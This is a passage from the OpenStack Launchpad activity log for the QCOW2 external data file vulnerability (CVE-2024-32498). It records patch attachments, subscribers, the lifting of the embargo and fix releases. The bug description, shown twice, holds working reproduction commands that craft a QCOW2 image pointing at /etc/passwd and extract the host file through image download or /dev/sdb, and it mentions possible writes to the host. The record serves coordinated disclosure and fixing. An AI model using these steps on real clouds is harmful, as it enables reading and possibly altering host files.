- Upload/register the disk image: `openstack image create --disk-format qcow2 --container-format bare --file "disk.qcow2" --private "my-image"`.
- Create a new instance: `openstack server create --flavor "nano" --image "my-image" "my-instance"`.
With the non-bootable instance there might be two ways to continue:
Option 1:
- Derive a new image: `openstack server image create --name "my-leak" "my-instance"`
- Download the image: `openstack image save --file "leak.qcow2" "my-leak"`
- The file content starts at guest cluster 0
Option 2: (this is untested because I reproduced it only in a production system)
- Reboot the instance in rescue mode: `openstack server rescue --image "cirros-0.6.2-x86_64-disk" "my-instance"`.
- Go to the Dashboard, open the console of the instance and login to the instance.
- Extract content from `/dev/sdb` with `cat /dev/sdb | fold -w 1024 | head -n 32`, `xxd -l 1024 -c 32 /dev/sdb` or similar methods.
- It might be possible to write to the host file. If the disk image is mounted with `qemu-nbd`, writes go through to the external data file. |
|
2024-06-25 20:58:05 |
Dan Smith |
attachment added |
|
cinder-additionals-fixed.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792392/+files/cinder-additionals-fixed.patch |
|
2024-06-26 09:02:10 |
Sylvain Bauza |
nova: importance |
Undecided |
Critical |
|
2024-06-26 09:02:13 |
Sylvain Bauza |
nova: assignee |
|
Sylvain Bauza (sylvain-bauza) |
|
2024-06-26 09:37:30 |
Jonas Schäfer |
bug |
|
|
added subscriber Martin Morgenstern |
2024-06-26 12:17:30 |
Brian Rosmaita |
attachment added |
|
cinder-2059809-unified-master-WIP.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792616/+files/cinder-2059809-unified-master-WIP.patch |
|
2024-06-26 13:23:56 |
Jeremy Stanley |
bug |
|
|
added subscriber Tobias Urdin |
2024-06-26 14:49:17 |
Dan Smith |
bug |
|
|
added subscriber Alfredo Garcia |
2024-06-26 15:02:55 |
Thomas Goirand |
attachment added |
|
CVE-2024-32498_4_repair_unit_tests.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792632/+files/CVE-2024-32498_4_repair_unit_tests.patch |
|
2024-06-26 15:32:26 |
Felix Huettner |
attachment added |
|
cinder-2059809-unified-master-v2.txt https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792633/+files/cinder-2059809-unified-master-v2.txt |
|
2024-06-26 15:32:54 |
Felix Huettner |
attachment added |
|
cinder-2059809-unified-stable-2024.1-v2.txt https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792634/+files/cinder-2059809-unified-stable-2024.1-v2.txt |
|
2024-06-26 15:33:08 |
Felix Huettner |
attachment added |
|
cinder-2059809-unified-stable-2023.2-v2.txt https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792637/+files/cinder-2059809-unified-stable-2023.2-v2.txt |
|
2024-06-26 15:33:23 |
Felix Huettner |
attachment added |
|
cinder-2059809-unified-stable-2023.1-v2.txt https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792638/+files/cinder-2059809-unified-stable-2023.1-v2.txt |
|
2024-06-26 15:33:36 |
Felix Huettner |
attachment added |
|
cinder-2059809-unified-unmaintained-zed-v2.txt https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792639/+files/cinder-2059809-unified-unmaintained-zed-v2.txt |
|
2024-06-26 23:32:49 |
Jeremy Stanley |
bug |
|
|
added subscriber Benjamin Oliff |
2024-06-27 07:24:34 |
Thomas Goirand |
attachment added |
|
CVE-2024-32498-glance-victoria.tar.gz https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792737/+files/CVE-2024-32498-glance-victoria.tar.gz |
|
2024-06-27 07:24:45 |
Felix Huettner |
attachment added |
|
cinder-2059809-additional-tests-master.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792738/+files/cinder-2059809-additional-tests-master.patch |
|
2024-06-27 16:46:24 |
Dan Smith |
attachment added |
|
glance-master-2058089.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792869/+files/glance-master-2058089.patch |
|
2024-06-27 17:17:54 |
Dan Smith |
attachment removed |
Nova unified patch for master https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792026/+files/nova-master-2059809.patch |
|
|
2024-06-27 17:17:59 |
Dan Smith |
attachment removed |
Nova unified patch for 2024.1 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792027/+files/nova-2024.1-2059809.patch |
|
|
2024-06-27 17:18:04 |
Dan Smith |
attachment removed |
Nova unified patch for 2023.2 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792028/+files/nova-2023.2-2059809.patch |
|
|
2024-06-27 17:18:10 |
Dan Smith |
attachment removed |
Nova unified patch for 2023.1 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792029/+files/nova-2023.1-2059809.patch |
|
|
2024-06-27 17:18:16 |
Dan Smith |
attachment removed |
nova-master-2059809-additional.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792298/+files/nova-master-2059809-additional.patch |
|
|
2024-06-27 17:18:23 |
Dan Smith |
attachment removed |
nova-2024.1-2059809-additional.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792359/+files/nova-2024.1-2059809-additional.patch |
|
|
2024-06-27 17:18:30 |
Dan Smith |
attachment removed |
nova-2023.2-2059809-additional.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792361/+files/nova-2023.2-2059809-additional.patch |
|
|
2024-06-27 17:18:36 |
Dan Smith |
attachment removed |
nova-2023.1-2059809-additional.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792362/+files/nova-2023.1-2059809-additional.patch |
|
|
2024-06-27 17:20:21 |
Dan Smith |
attachment added |
|
nova-master-2059809.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792870/+files/nova-master-2059809.patch |
|
2024-06-27 17:21:04 |
Dan Smith |
attachment added |
|
Nova unified patch for 2024.1 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792871/+files/nova-2024.1-2059809.patch |
|
2024-06-27 17:21:23 |
Dan Smith |
attachment added |
|
Nova unified patch for 2023.2 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792872/+files/nova-2023.2-2059809.patch |
|
2024-06-27 17:21:44 |
Dan Smith |
attachment added |
|
Nova unified patch for 2023.1 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792873/+files/nova-2023.1-2059809.patch |
|
2024-06-27 19:31:38 |
Brian Rosmaita |
attachment removed |
cinder-2059809-unified-master-WIP.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792616/+files/cinder-2059809-unified-master-WIP.patch |
|
|
2024-06-27 20:36:52 |
Dan Smith |
attachment removed |
Glance unified patch for master (with QED support) https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792869/+files/glance-master-2058089.patch |
|
|
2024-06-27 20:37:21 |
Dan Smith |
attachment added |
|
Glance unified patch for master (with QED support) https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792906/+files/glance-master-2058089.patch |
|
2024-06-28 04:39:01 |
Brian Rosmaita |
attachment added |
|
cinder-2059809-unified-master-v7.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792990/+files/cinder-2059809-unified-master-v7.patch |
|
2024-06-28 13:49:26 |
Dan Smith |
attachment removed |
Glance unified patch for master https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792016/+files/glance-master-2059809.patch |
|
|
2024-06-28 13:49:32 |
Dan Smith |
attachment removed |
Glance unified patch for 2024.1 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792017/+files/glance-2024.1-2059809.patch |
|
|
2024-06-28 13:49:39 |
Dan Smith |
attachment removed |
Glance unified patch for 2023.2 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792018/+files/glance-2023.2-2059809.patch |
|
|
2024-06-28 13:49:46 |
Dan Smith |
attachment removed |
Glance unified patch for 2023.1 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792022/+files/glance-2023.1-2059809.patch |
|
|
2024-06-28 13:50:59 |
Dan Smith |
attachment added |
|
Glance unified patch for 2024.1 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5793094/+files/glance-2024.1-2059809.patch |
|
2024-06-28 13:51:21 |
Dan Smith |
attachment added |
|
Glance unified patch for 2023.2 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5793095/+files/glance-2023.2-2059809.patch |
|
2024-06-28 13:51:40 |
Dan Smith |
attachment added |
|
Glance unified patch for 2023.1 https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5793096/+files/glance-2023.1-2059809.patch |
|
2024-06-28 13:59:29 |
Dan Smith |
attachment added |
|
Train-ish example backport for glance https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5793098/+files/glance-train-minimal.patch |
|
2024-06-28 18:08:24 |
Brian Rosmaita |
attachment removed |
cinder-2059809-2024.1.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761489/+files/cinder-2059809-2024.1.patch |
|
|
2024-06-28 18:08:43 |
Brian Rosmaita |
attachment removed |
cinder-2059809-2023.2.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761490/+files/cinder-2059809-2023.2.patch |
|
|
2024-06-28 18:08:56 |
Brian Rosmaita |
attachment removed |
cinder-2059809-2023.1.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761491/+files/cinder-2059809-2023.1.patch |
|
|
2024-06-28 18:09:18 |
Brian Rosmaita |
attachment removed |
cinder-2059809-zed.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761492/+files/cinder-2059809-zed.patch |
|
|
2024-06-28 18:09:52 |
Brian Rosmaita |
attachment removed |
cinder-2059809-yoga.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5761493/+files/cinder-2059809-yoga.patch |
|
|
2024-06-28 18:21:13 |
Brian Rosmaita |
attachment added |
|
cinder-2059809-unified-2024.1-v7.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5793292/+files/cinder-2059809-unified-2024.1-v7.patch |
|
2024-06-28 18:21:58 |
Brian Rosmaita |
attachment added |
|
cinder-2059809-unified-2023.2-v7.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5793293/+files/cinder-2059809-unified-2023.2-v7.patch |
|
2024-06-28 18:22:40 |
Brian Rosmaita |
attachment added |
|
cinder-2059809-unified-2023.1-v7.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5793294/+files/cinder-2059809-unified-2023.1-v7.patch |
|
2024-07-01 15:13:44 |
Arnaud Morin |
cve linked |
|
2022-47951 |
|
2024-07-01 16:18:00 |
Dan Smith |
attachment added |
|
late-nova-fix.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5793883/+files/late-nova-fix.patch |
|
2024-07-02 02:21:32 |
Jake Yip |
bug |
|
|
added subscriber Timothy Rice |
2024-07-02 02:39:32 |
Timothy Rice |
bug |
|
|
added subscriber Nhat Q. Ngo |
2024-07-02 02:42:04 |
Timothy Rice |
bug |
|
|
added subscriber Linh Vu |
2024-07-02 02:49:59 |
Timothy Rice |
bug |
|
|
added subscriber zrsolis |
2024-07-02 03:10:04 |
zrsolis |
bug |
|
|
added subscriber Chris Matthews |
2024-07-02 03:14:28 |
zrsolis |
bug |
|
|
added subscriber Michael Fitzgerald |
2024-07-02 03:22:11 |
zrsolis |
bug |
|
|
added subscriber Shahzaib |
2024-07-02 03:27:55 |
zrsolis |
bug |
|
|
added subscriber Nicholas Lloyd |
2024-07-02 06:01:30 |
Timothy Rice |
bug |
|
|
added subscriber Eugene de Beste |
2024-07-02 08:13:08 |
Arnaud Morin |
attachment added |
|
late-nova-fix-2.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5794139/+files/late-nova-fix-2.patch |
|
2024-07-02 08:21:56 |
Arnaud Morin |
attachment removed |
late-nova-fix-2.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5794139/+files/late-nova-fix-2.patch |
|
|
2024-07-02 08:27:53 |
Arnaud Morin |
attachment added |
|
late-nova-fix-2.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5794140/+files/late-nova-fix-2.patch |
|
2024-07-02 08:35:10 |
Eugene de Beste |
bug |
|
|
added subscriber Vladimir Prokofev |
2024-07-02 09:34:26 |
Arnaud Morin |
attachment added |
|
late-nova-fix-2-units.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5794144/+files/late-nova-fix-2-units.patch |
|
2024-07-02 13:07:07 |
Dan Smith |
bug |
|
|
added subscriber Balazs Gibizer |
2024-07-02 13:15:52 |
Dan Smith |
bug |
|
|
added subscriber sean mooney |
2024-07-02 13:32:58 |
Jeremy Stanley |
summary |
Arbitrary file access through QCOW2 external data file (CVE-2024-32498) |
[OSSA-2024-001] Arbitrary file access through QCOW2 external data file (CVE-2024-32498) |
|
2024-07-02 14:00:41 |
Arnaud Morin |
attachment removed |
late-nova-fix-2.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5794140/+files/late-nova-fix-2.patch |
|
|
2024-07-02 14:01:19 |
Arnaud Morin |
attachment removed |
late-nova-fix-2-units.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5794144/+files/late-nova-fix-2-units.patch |
|
|
2024-07-02 14:06:19 |
Jeremy Stanley |
description |
This issue is being treated as a potential security risk under
embargo. Please do not make any public mention of embargoed
(private) security vulnerabilities before their coordinated
publication by the OpenStack Vulnerability Management Team in the
form of an official OpenStack Security Advisory. This includes
discussion of the bug or associated fixes in public forums such as
mailing lists, code review systems and bug trackers. Please also
avoid private disclosure to other individuals not already approved
for access to this information, and provide this same reminder to
those who are made aware of the issue prior to publication. All
discussion should remain confined to this private bug report, and
any proposed fixes should be added to the bug as attachments. This
embargo shall not extend past 2024-07-02 and will be made
public by or on that date even if no fix is identified.
OpenStack has security vulnerability in Nova or Glance, that allows an authenticated attacker to read arbitrary files.
QCOW2 has two mechanisms to read from another file. The backing file issue was reported and fixed with OSSA-2015-014, but the external data file was not discovered.
Steps to Reproduce:
- Create a disk image: `qemu-img create -f qcow2 -o data_file=abcdefghigh,data_file_raw=on disk.qcow2 1G` with `abcdefghigh` a placeholder of the same length as the file to read. `qemu-img` will zero it.
- Replace the filename in the disk image: `sed -i "s#abcdefghigh#/etc/passwd#" disk.qcow2`.
- Upload/register the disk image: `openstack image create --disk-format qcow2 --container-format bare --file "disk.qcow2" --private "my-image"`.
- Create a new instance: `openstack server create --flavor "nano" --image "my-image" "my-instance"`.
With the non-bootable instance there might be two ways to continue:
Option 1:
- Derive a new image: `openstack server image create --name "my-leak" "my-instance"`
- Download the image: `openstack image save --file "leak.qcow2" "my-leak"`
- The file content starts at guest cluster 0
Option 2: (this is untested because I reproduced it only in a production system)
- Reboot the instance in rescue mode: `openstack server rescue --image "cirros-0.6.2-x86_64-disk" "my-instance"`.
- Go to the Dashboard, open the console of the instance and login to the instance.
- Extract content from `/dev/sdb` with `cat /dev/sdb | fold -w 1024 | head -n 32`, `xxd -l 1024 -c 32 /dev/sdb` or similar methods.
- It might be possible to write to the host file. If the disk image is mounted with `qemu-nbd`, writes go through to the external data file. |
OpenStack has security vulnerability in Nova or Glance, that allows an authenticated attacker to read arbitrary files.
QCOW2 has two mechanisms to read from another file. The backing file issue was reported and fixed with OSSA-2015-014, but the external data file was not discovered.
Steps to Reproduce:
- Create a disk image: `qemu-img create -f qcow2 -o data_file=abcdefghigh,data_file_raw=on disk.qcow2 1G` with `abcdefghigh` a placeholder of the same length as the file to read. `qemu-img` will zero it.
- Replace the filename in the disk image: `sed -i "s#abcdefghigh#/etc/passwd#" disk.qcow2`.
- Upload/register the disk image: `openstack image create --disk-format qcow2 --container-format bare --file "disk.qcow2" --private "my-image"`.
- Create a new instance: `openstack server create --flavor "nano" --image "my-image" "my-instance"`.
With the non-bootable instance there might be two ways to continue:
Option 1:
- Derive a new image: `openstack server image create --name "my-leak" "my-instance"`
- Download the image: `openstack image save --file "leak.qcow2" "my-leak"`
- The file content starts at guest cluster 0
Option 2: (this is untested because I reproduced it only in a production system)
- Reboot the instance in rescue mode: `openstack server rescue --image "cirros-0.6.2-x86_64-disk" "my-instance"`.
- Go to the Dashboard, open the console of the instance and login to the instance.
- Extract content from `/dev/sdb` with `cat /dev/sdb | fold -w 1024 | head -n 32`, `xxd -l 1024 -c 32 /dev/sdb` or similar methods.
- It might be possible to write to the host file. If the disk image is mounted with `qemu-nbd`, writes go through to the external data file. |
|
2024-07-02 14:06:28 |
Jeremy Stanley |
information type |
Private Security |
Public Security |
|
2024-07-02 15:11:16 |
Bartosz Bezak |
bug |
|
|
added subscriber Bartosz Bezak |
2024-07-02 16:05:19 |
OpenStack Infra |
ossa: status |
In Progress |
Fix Released |
|
2024-07-03 08:36:14 |
Hannes von Haugwitz |
bug |
|
|
added subscriber Hannes von Haugwitz |
2024-07-03 09:45:30 |
James Page |
bug task added |
|
cloud-archive |
|
2024-07-03 09:46:10 |
James Page |
nominated for series |
|
cloud-archive/caracal |
|
2024-07-03 09:46:10 |
James Page |
bug task added |
|
cloud-archive/caracal |
|
2024-07-03 09:46:10 |
James Page |
nominated for series |
|
cloud-archive/yoga |
|
2024-07-03 09:46:10 |
James Page |
bug task added |
|
cloud-archive/yoga |
|
2024-07-03 09:46:10 |
James Page |
nominated for series |
|
cloud-archive/bobcat |
|
2024-07-03 09:46:10 |
James Page |
bug task added |
|
cloud-archive/bobcat |
|
2024-07-03 09:46:10 |
James Page |
nominated for series |
|
cloud-archive/antelope |
|
2024-07-03 09:46:10 |
James Page |
bug task added |
|
cloud-archive/antelope |
|
2024-07-03 09:46:10 |
James Page |
nominated for series |
|
cloud-archive/ussuri |
|
2024-07-03 09:46:10 |
James Page |
bug task added |
|
cloud-archive/ussuri |
|
2024-07-03 09:46:30 |
James Page |
cloud-archive/antelope: status |
New |
Fix Committed |
|
2024-07-03 09:46:43 |
James Page |
cloud-archive/bobcat: status |
New |
Fix Committed |
|
2024-07-03 09:46:56 |
James Page |
cloud-archive/caracal: status |
New |
Fix Committed |
|
2024-07-03 09:47:09 |
James Page |
cloud-archive/ussuri: status |
New |
Fix Committed |
|
2024-07-03 09:47:23 |
James Page |
cloud-archive/yoga: status |
New |
Fix Committed |
|
2024-07-03 13:52:51 |
Jeremy Stanley |
bug watch added |
|
https://bugzilla.redhat.com/show_bug.cgi?id=2278875 |
|
2024-07-03 14:02:24 |
Brian Rosmaita |
attachment removed |
cinder-2059809-unified-master-v7.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5792990/+files/cinder-2059809-unified-master-v7.patch |
|
|
2024-07-03 14:02:56 |
Brian Rosmaita |
attachment removed |
cinder-2059809-unified-2024.1-v7.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5793292/+files/cinder-2059809-unified-2024.1-v7.patch |
|
|
2024-07-03 14:03:21 |
Brian Rosmaita |
attachment removed |
cinder-2059809-unified-2023.2-v7.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5793293/+files/cinder-2059809-unified-2023.2-v7.patch |
|
|
2024-07-03 14:04:03 |
Brian Rosmaita |
attachment removed |
cinder-2059809-unified-2023.1-v7.patch https://bugs.launchpad.net/nova/+bug/2059809/+attachment/5793294/+files/cinder-2059809-unified-2023.1-v7.patch |
|
|
2024-07-03 16:24:40 |
OpenStack Infra |
nova: status |
In Progress |
Fix Released |
|
2024-07-03 18:34:51 |
Lukasz Zalewski |
bug |
|
|
added subscriber Lukasz Zalewski |
2024-07-03 20:08:06 |
OpenStack Infra |
cinder: status |
In Progress |
Fix Released |
|
2024-07-04 09:21:21 |
OpenStack Infra |
glance: status |
In Progress |
Fix Released |
|
2024-07-04 09:31:23 |
Nobuto Murata |
bug |
|
|
added subscriber Nobuto Murata |
2024-07-04 21:51:23 |
Vladimir Prokofev |
removed subscriber Vladimir Prokofev |
|
|
|
2024-07-06 22:41:35 |
OpenStack Infra |
tags |
|
in-unmaintained-zed |
|
2024-07-08 12:58:20 |
James Page |
cve linked |
|
2023-2088 |
|
2024-07-08 12:58:24 |
James Page |
cloud-archive/caracal: status |
Fix Committed |
Fix Released |
|
2024-07-08 13:00:55 |
James Page |
cloud-archive/bobcat: status |
Fix Committed |
Fix Released |
|
2024-07-08 13:02:22 |
James Page |
cloud-archive/antelope: status |
Fix Committed |
Fix Released |
|
2024-07-08 13:05:28 |
James Page |
cve linked |
|
2020-10755 |
|
2024-07-08 13:05:32 |
James Page |
cloud-archive/yoga: status |
Fix Committed |
Fix Released |
|
2024-07-09 08:13:54 |
Chris Valean |
bug |
|
|
added subscriber Chris Valean |
2024-07-10 22:44:53 |
Julius |
bug |
|
|
added subscriber Julius |
2024-08-13 10:52:56 |
OpenStack Infra |
tags |
in-unmaintained-zed |
in-unmaintained-yoga in-unmaintained-zed |
|
2024-08-19 08:32:29 |
James Page |
cloud-archive: status |
Fix Released |
Fix Committed |
|
2024-08-21 14:24:08 |
James Page |
cloud-archive: status |
Fix Committed |
Fix Released |
|